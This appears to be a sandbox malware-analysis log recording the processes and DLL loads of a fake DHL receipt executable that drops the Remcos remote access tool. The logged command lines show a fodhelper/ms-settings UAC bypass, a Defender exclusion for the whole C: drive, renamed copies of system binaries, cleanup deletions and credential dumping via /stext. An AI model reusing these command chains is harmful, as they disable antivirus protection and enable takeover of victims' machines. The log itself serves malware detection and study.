Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe File read: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe "C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe"
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process created: C:\Users\Public\Libraries\yfkwifxL.pif C:\Users\Public\Libraries\yfkwifxL.pif
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe C:\\Users\\Public\\Libraries\\Lxfiwkfy.PIF
Source: C:\Users\Public\Libraries\yfkwifxL.pif Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\xkn.exe Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\huychgflg"
Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\jpluazqfutyle"
Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\tjrfarbgibqpoisd"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: unknown Process created: C:\Windows\System32\SystemSettingsAdminFlows.exe "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
Source: unknown Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
Source: unknown Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process created: C:\Users\Public\Libraries\yfkwifxL.pif C:\Users\Public\Libraries\yfkwifxL.pif Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe C:\\Users\\Public\\Libraries\\Lxfiwkfy.PIF Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe" Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\huychgflg" Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\jpluazqfutyle" Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\tjrfarbgibqpoisd" Jump to behavior
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" Jump to behavior
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: archiveint.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: url.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll Jump to behavior
